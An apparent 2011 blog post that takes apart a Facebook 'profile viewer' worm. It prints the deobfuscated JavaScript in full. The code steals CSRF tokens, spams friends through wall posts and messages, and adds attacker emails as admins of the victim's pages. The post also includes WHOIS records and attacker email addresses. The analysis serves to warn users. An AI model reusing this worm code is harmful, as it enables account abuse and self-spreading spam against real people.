Archive

Posts Tagged ‘Facebook’

profileview.info disassembled – Or the anatomy of a facebook worm

2011/02/22 Leave a comment

Have you received one of those links per Facebook?

Wow! Seems like lots of people stalk me – http://ow.ly/3YDVb
Secret tool shows who stalks your pics – http://tinyurl.com/6gowfed
New FB tool shows who stalks your profile– http://ow.ly/3YDVB
Insane! Awesome tool to see who looks at your pics >> http://goo.gl/lfDvG

Don’t click them. I will show you why:

When you access the Website, it starts a javascript encoded as shell code:

http://pastebin.com/umwmnbaN

It really looks like garbage so lets decompile it

http://pastebin.com/FmGN13Tm

So lets see what it does (Comments are always BELOW the code):

function obscurify(my_content) {
st = my_content[‘split’](‘,’);
d = ”;
for (i = 0; i < st[‘length’]; i++) {
d += String[‘fromCharCode’](st[i] – 24);
};
eval(d);
};

Ok, its deobscurifying the content of the code

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
iemails = array_emails[‘split’](‘,’);
main_emails = [];
for (i = 0; i < iemails[‘length’]; i++) {
main_emails[i] = ‘friendselector_input[]=’ + iemails[i] + ‘&friend_selected[]=’;
};
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/pages/edit/?id=’ + evil_facebook_page + ‘&sk=admin’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + Form_ID + ‘&fb_dtsg=’ + csrf_token + ‘&fbpage_id=’ + evil_facebook_page + ‘&’ + main_emails[‘join’](‘&’) + ‘&save=1’);
};
};

Here is the function to invite your friends to the app

function makePost(form_id, message_content, target_friend, unused_var1) {
formx = form_id[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = form_id[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = form_id[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
msg = message_content[‘randomize’]() + ‘\x0A\x0A’;
text_post = ”;
text_actual = ”;
pxt = ‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + target_friend[‘split’](‘|’)[0] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(msg + text_actual[‘replace’](/\, $/, ”)) + ‘&xhpc_message=’ + encodeURIComponent(msg + text_post[‘replace’](/\, $/, ”)) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’;
update(pxt);
};

This is the mail function for spamming your friends

function update(evil_facebook_app) {
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/updatestatus.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(evil_facebook_app);
};
};

This function posts on your wall (setting status messsage)

goog1 = ‘http://goo.gl/cvY4D&#8217;;
goog2 = ‘http://goo.gl/euvS3&#8217;;
goog3 = ‘http://tiny.cc/v1bwd&#8217;;
goog4 = ‘http://goo.gl/G0yae&#8217;;
goog5 = ‘http://goo.gl/NMclq&#8217;;
goog6 = ‘http://goo.gl/S89Bx&#8217;;
event_id = ‘168046893242650’;
page_id_x = ‘195926070436089’;
page_id_xx = ‘136589129739532’;
statuses = [‘Wow! Seems like lots of people stalk me – ‘ + goog1, ‘New FB tool shows who stalks your profile– ‘ + goog2, ‘Secret tool shows who stalks your pics ‘ + goog3, ‘Insane! Awesome tool to see who looks at your pics >> ‘ + goog4, ‘According to ‘ + goog5 + ‘ you\’re my top stalker. Creep.’, ‘Secret tool shows who stalks your pics – ‘ + goog6];
subjects = [‘Check this out!’, ‘Hey, whats happening?’, ‘Hey! This is awesome’];

Here are the links for the spam messages

admin_emails = ‘wintersaccohoqr@hotmail.com,adrialovato306@yahoo.com’;

These are the accounts of the creators of the malware, receiving all your facebook email adresses, they are sold to spammers…

Array[‘prototype’][‘randomize’] = function () {
return this[Math[‘floor’](Math[‘random’]() * this[‘length’])];
};
Object[‘prototype’][‘isReady’] = function () {
if (this[‘readyState’] == 4 && this[‘status’] == 200) {
return true;
} else {
return false;
};
};
String[‘prototype’][‘getFriends’] = function () {
friends2 = this[‘match’](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\”>(<span[^>]+>|)[^<>]+/gi)[‘join’](‘:’)[‘replace’](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, ”)[‘replace’](/\\\\\\\”>/gi, ‘|’)[‘split’](‘:’)[‘slice’](1);
return friends2;
};

Prototype functions

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
iemails = array_emails[‘split’](‘,’);
main_emails = [];
for (i = 0; i < iemails[‘length’]; i++) {
main_emails[i] = ‘friendselector_input[]=’ + iemails[i] + ‘&friend_selected[]=’;
};
with(newx = new XMLHttpRequest) {
open(‘POST’, ‘/pages/edit/?id=’ + evil_facebook_page + ‘&sk=admin’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + Form_ID + ‘&fb_dtsg=’ + csrf_token + ‘&fbpage_id=’ + evil_facebook_page + ‘&’ + main_emails[‘join’](‘&’) + ‘&save=1’);
};
};

Ok, the addAdmin function again, the guys didn’t know much about coding.

function loading() {
var _0x91e5x10 = document[‘createElement’](‘div’);
_0x91e5x10[‘id’] = ‘screwyouz’;
_0x91e5x10[‘setAttribute’](‘align’, ‘center’);
_0x91e5x10[‘style’][‘margin’] = ‘0px auto’;
_0x91e5x10[‘style’][‘position’] = ‘absolute’;
_0x91e5x10[‘style’][‘top’] = ’10px’;
_0x91e5x10[‘style’][‘zindex’] = ‘100’;
_0x91e5x10[‘className’] = ‘screwyou’;
_0x91e5x10[‘innerHTML’] = ‘<br /><br /><br /><br /><br /><center><img src=”http://fbviews.org/process.gif&#8221; /><br />Scanning may take up to 3 minutes</center>’;
document[‘body’][‘appendChild’](_0x91e5x10);
};

This is what the coders of the malware think of you. “Screwyou”. Its showing an animation, like it would scan your profile. Its just b**s***

function makePost(form_id, message_content, target_friend, unused_var1) {

<snip>

function update(evil_facebook_app) {

<snip>

Copy & Paste can sometimes be a hard job, you loose control how often you paste something….

if (window[‘location’][‘href’] == ‘http://www.facebook.com/&#8217;) {
formx = (res = document[‘body’][‘innerHTML’])[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = res[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = res[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
} else {
with(muhaha = new XMLHttpRequest) {
open(‘GET’, ‘/’, false);
send(null);
};
formx = (res = muhaha[‘responseText’])[‘match’](/name=”post_form_id” value=”([\d\w]+)”/)[1];
dtx = res[‘match’](/name=”fb_dtsg” value=”([^”]+)”/)[1];
composerx = res[‘match’](/name=\\\”xhpc_composerid\\\” value=\\\”([^”]+)\\\”/)[1];
};

Now they gather a new CSRF Code of the post field in the facebook site. This feature should normaly prevent Cross-Side-Request-Forgery

alert(‘Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.’);

This shows the messagebox, like it would take so long to scan your profile. In reality its just posting on all of your friends walls and sending out emails..Its also making you a fan of the malware…

update(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(stx = statuses[‘randomize’]()) + ‘&xhpc_message=’ + encodeURIComponent(stx) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’);
with(newz = new XMLHttpRequest) {
loading();
open(‘POST’, ‘/ajax/pages/fan_status.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘fbpage_id=’ + page_id_x + ‘&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&post_form_id_source=AsyncRequest’);
};
with(newzz = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/pages/fan_status.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘fbpage_id=’ + page_id_xx + ‘&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&post_form_id_source=AsyncRequest’);
};
void 0;
with(fr = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/browser/list/friends/all/?uid=’ + (me = document[‘cookie’][‘match’](/c_user=(\d+)/)[1]) + ‘&offset=0&dual=1&__a=1’);
onreadystatechange = function () {
if (fr[‘isReady’]()) {
friends = fr[‘responseText’][‘getFriends’]();
idx = [];
for (i = 0; i < friends[‘length’]; i++) {
if (!isNaN(friends[i][‘split’](‘|’)[0])) {
idx[i] = ‘ids[‘ + i + ‘]=’ + friends[i][‘split’](‘|’)[0];
};
};
with(invi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/social_graph/invite_dialog.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&’ + idx[‘join’](‘&’) + ‘&node_id=’ + event_id + ‘&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest’);
};
cnt_fr = 0;
tx = setInterval(function () {
if (cnt_fr == friends[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;
clearInterval(tx);
};
makePost(document[‘body’][‘innerHTML’], statuses, friends[cnt_fr], friends);
with(xa = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/messaging/composer.php?__a=1&__d=1’);
onreadystatechange = function () {
if (xa[‘isReady’]()) {
compi = xa[‘responseText’][‘match’](/([\d\w]+)_error/)[1];
pxi = ‘ids_’ + compi + ‘[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&subject=’ + encodeURIComponent(subjects[‘randomize’]()) + ‘&status=’ + encodeURIComponent(statuses[‘randomize’]()) + ‘&ids[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&action=send_new&home_tab_id=1&profile_id=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&target_id=0&app_id=&&composer_id=’ + compi + ‘&hey_kid_im_a_composer=true&thread&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest’;
if (cnt_fr < 15) {
with(mi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(pxi);
};
};
};
};
send(null);
};
cnt_fr += 1;
}, 3000);
};
};
send(null);
};

This is the code doing the dirty work..

with(fr = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/browser/list/friends/all/?uid=’ + (me = document[‘cookie’][‘match’](/c_user=(\d+)/)[1]) + ‘&offset=0&dual=1&__a=1’);

It browses all your friends

onreadystatechange = function () {

if (fr[‘isReady’]()) {
friends = fr[‘responseText’][‘getFriends’]();
idx = [];
for (i = 0; i < friends[‘length’]; i++) {
if (!isNaN(friends[i][‘split’](‘|’)[0])) {
idx[i] = ‘ids[‘ + i + ‘]=’ + friends[i][‘split’](‘|’)[0];
};
};
with(invi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/social_graph/invite_dialog.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&’ + idx[‘join’](‘&’) + ‘&node_id=’ + event_id + ‘&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest’);
};

 

Send them an invitation

 

cnt_fr = 0;
tx = setInterval(function () {
if (cnt_fr == friends[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;

 

This is the page trying to calculate who visits who.

clearInterval(tx);
};
makePost(document[‘body’][‘innerHTML’], statuses, friends[cnt_fr], friends);
with(xa = new XMLHttpRequest) {
open(‘GET’, ‘/ajax/messaging/composer.php?__a=1&__d=1’);
onreadystatechange = function () {
if (xa[‘isReady’]()) {
compi = xa[‘responseText’][‘match’](/([\d\w]+)_error/)[1];
pxi = ‘ids_’ + compi + ‘[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&subject=’ + encodeURIComponent(subjects[‘randomize’]()) + ‘&status=’ + encodeURIComponent(statuses[‘randomize’]()) + ‘&ids[0]=’ + friends[cnt_fr][‘split’](‘|’)[0] + ‘&action=send_new&home_tab_id=1&profile_id=’ + document[‘cookie’][‘match’](/c_user=(\d+)/)[1] + ‘&target_id=0&app_id=&&composer_id=’ + compi + ‘&hey_kid_im_a_composer=true&thread&post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest’;
if (cnt_fr < 15) {
with(mi = new XMLHttpRequest) {
open(‘POST’, ‘/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1’);
setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
send(pxi);
};
};
};
};
send(null);
};
cnt_fr += 1;
}, 3000);
};
};
send(null);
};
with(ins = new XMLHttpRequest) {
open(‘GET’, ‘/insights/?_fb_noscript=1’);
onreadystatechange = function () {
if (ins[‘isReady’]()) {
ids = ins[‘responseText’][‘match’](/po_\d+”>View/gi)[‘join’](‘:’)[‘replace’](/(po_|”>View)/gi, ”)[‘split’](‘:’);
cnt_pages = 0;
tz = setInterval(function () {
if (cnt_pages == ids[‘length’]) {
window[‘location’] = ‘http://fbviews.org/result.php&#8217;;
clearInterval(tz);
};
update(‘post_form_id=’ + formx + ‘&fb_dtsg=’ + dtx + ‘&xhpc_composerid=’ + composerx + ‘&xhpc_targetid=’ + ids[cnt_pages] + ‘&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=’ + encodeURIComponent(stx = statuses[‘randomize’]()) + ‘&xhpc_message=’ + encodeURIComponent(stx) + ‘&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest’);
addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
cnt_pages += 1;
}, 3000);
};
};
send(null);
};

Here it posts the results to your page…

So its a big price for some unreliable information. You give away all your contact email adresses for free and send spam in your name! this will lower your reputation and fill up your email account with viagra mails!

Some more information about the domains:

whois fbviews.org

Domain ID:D161495457-LROR
Domain Name:FBVIEWS.ORG
Created On:14-Feb-2011 05:50:54 UTC
Last Updated On:14-Feb-2011 05:58:34 UTC
Expiration Date:14-Feb-2012 05:50:54 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:de089e4b90247f03
Registrant Name:misterĀ  hood
Registrant Street1:14762 Geronomo st
Registrant Street2:
Registrant Street3:
Registrant City:San Diego
Registrant State/Province:CA
Registrant Postal Code:92105
Registrant Country:US
Registrant Phone:+1.6192264473
Registrant Phone Ext.:
Registrant FAX:+1.5555555555
Registrant FAX Ext.:
Registrant Email:eviewoolfolk579@yahoo.com

whois profileview.info

Domain ID:D36383271-LRMS
Domain Name:PROFILEVIEW.INFO
Created On:17-Jan-2011 03:27:44 UTC
Last Updated On:17-Jan-2011 10:37:21 UTC
Expiration Date:17-Jan-2012 03:27:44 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR72743087
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:PROFILEVIEW.INFO@domainsbyproxy.com

Advertisements